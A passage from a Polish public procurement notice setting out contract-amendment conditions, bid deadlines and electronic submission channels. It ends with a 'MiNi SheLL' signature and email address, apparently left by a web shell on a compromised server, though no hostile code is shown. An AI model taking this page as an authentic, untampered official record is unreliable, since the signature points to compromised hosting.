minimalnej stawki<br/>godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002r. o minimalnym<br/>wynagrodzeniu za pracę - każda ze stron umowy, w terminie 30 dni od dnia wejścia w życie<br/>przepisów dokonujących tych zmian, może zwrócić się do drugiej strony o przeprowadzenie<br/>negocjacji w sprawie odpowiedniej zmiany wynagrodzenia, jeżeli zmiany te będą miały wpływ na<br/>koszty wykonania zamówienia przez wykonawcę oraz jeżeli wykonawca wykaże, że osoby<br/>wykonujące przedmiot umowy osiągały minimalne wynagrodzenie za pracę, stanowiącą<br/>przedmiot umowy;<br/>3) zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne - każda ze<br/>stron umowy, w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian, zmiany wynagrodzenia, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia<br/>przez wykonawcę;<br/>4) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018r. o pracowniczych planach kapitałowych -<br/>każda ze stron umowy, w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych<br/>zmian, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w sprawie<br/>odpowiedniej zmiany wynagrodzenia, jeżeli zmiany te będą miały wpływ na koszty wykonania<br/>zamówienia przez wykonawcę;<br/>5) zmian w stosunku do opisu przedmiotu zamówienia w zakresie wykonania prac nie<br/>wykraczających poza zakres przedmiotu zamówienia, w sytuacji możliwości usprawnienia<br/>realizacji przedmiotu umowy;<br/>6) zmian umowy związanych ze zmianą stanu prawnego w zakresie dotyczącym realizowanego<br/>przedmiotu umowy, który spowoduje konieczność zmiany sposobu jego wykonania przez<br/>wykonawcę;<br/>7) zmian osób wskazanych w ofercie wykonawcy, zdolnych do wykonania przedmiotu umowy,<br/>na inne osoby legitymujące się co najmniej doświadczeniem wymaganym do wykazania<br/>spełniania warunków udziału w przedmiotowym postępowaniu; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP pod adresem internetowym https://epuap.gov.pl/wps/portal i udostępnionego również na miniPortalu pod adresem internetowym https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-21 10:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Ciąg dalszy "Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>8) zmian terminu wykonania zamówienia, z przyczyn niezależnych od wykonawcy, wykazanych<br/>przez wykonawcę, w szczególności w przypadku:<br/>a) niekorzystnych warunków atmosferycznych, uniemożliwiających wykonanie przedmiotu<br/>umowy zgodnie<br/>z przyjętą technologią, mających bezpośredni wpływ na termin jego wykonania - w związku z<br/>tym termin wykonania przedmiotu umowy może zostać przesunięty o czas tych niekorzystnych<br/>warunków atmosferycznych oraz o czas niezbędny do usunięcia ich skutków,<br/>b) jeżeli opóźnieniu ulegnie wykonanie prac niezbędnych do realizacji zamówienia, do których<br/>wykonania zobowiązany jest zamawiający - w związku z tym termin wykonania przedmiotu<br/>umowy może zostać przesunięty o czas niezbędny do wykonania opóźnionych prac,<br/>c) gdy prace objęte umową zostały wstrzymane przez właściwe organy, z przyczyn niezależnych<br/>od wykonawcy, co uniemożliwia terminowe wykonanie przedmiotu umowy - w związku z tym<br/>termin wykonania przedmiotu umowy może zostać przesunięty o czas niezbędny do wykonania<br/>prac wynikających z zaleceń właściwych organów,<br/>d) uzasadnionych przyczyn technicznych lub technologicznych;<br/>9) innych istotnych zmian umowy w zakresie, którego nie można przewidzieć na etapie publikacji<br/>ogłoszenia o zamówieniu - w przypadku wystąpienia nadzwyczajnej okoliczności, której nie<br/>można było przewidzieć na etapie publikacji ogłoszenia o zamówieniu, a która spowoduje, że prawidłowe wykonanie zamówienia będzie uzależnione od tej zmiany;<br/>10) wprowadzania zmian wysokości wynagrodzenia należnego wykonawcy (w tym także jego<br/>obniżenia), w przypadku zmiany ceny kluczowych materiałów lub kosztów związanych z<br/>realizacją zamówienia (kosztów towarowej produkcji rolnej - na podstawie wskaźnika wzrostu<br/>cen towarowej produkcji rolniczej) - każda ze stron umowy może zwrócić się do drugiej strony z<br/>żądaniem odpowiedniej zmiany wynagrodzenia:<br/>a) minimalny poziom zmiany ceny ww. kluczowych materiałów lub kosztów, uprawniający strony<br/>umowy do żądania zmiany wynagrodzenia, musi przekraczać 7%,<br/>b) początkowy termin ustalenia zmiany wynagrodzenia stanowi dzień otwarcia ofert w<br/>przedmiotowym postępowaniu o udzielenie zamówienia publicznego,<br/>c) sposób ustalania zmiany wynagrodzenia odbywać się będzie z odesłaniem do wskaźnika<br/>zmiany ceny materiałów lub kosztów, ogłaszanego przez Prezesa Głównego Urzędu<br/>Statystycznego - dotyczącego „Wskaźnik wzrostu cen towarowej produkcji rolniczej”,<br/>d) maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający w efekcie<br/>zastosowania ww. postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia<br/>wynosi 3%.<br/>II. 1. Adres strony internetowej prowadzonego postępowania, strony internetowej, na której<br/>udostępniane będą zmiany i wyjaśnienia treści specyfikacji warunków zamówienia oraz inne<br/>dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie<br/>zamówienia: http://bip.parseta.org.pl.<br/>2. Adres strony internetowej do składania ofert i wszelkich dokumentów lub oświadczeń<br/>składanych wraz z ofertą (przy użyciu „miniPortalu”): https://miniportal.uzp.gov.pl.

Creat By MiNi SheLL
Email: jattceo@gmail.com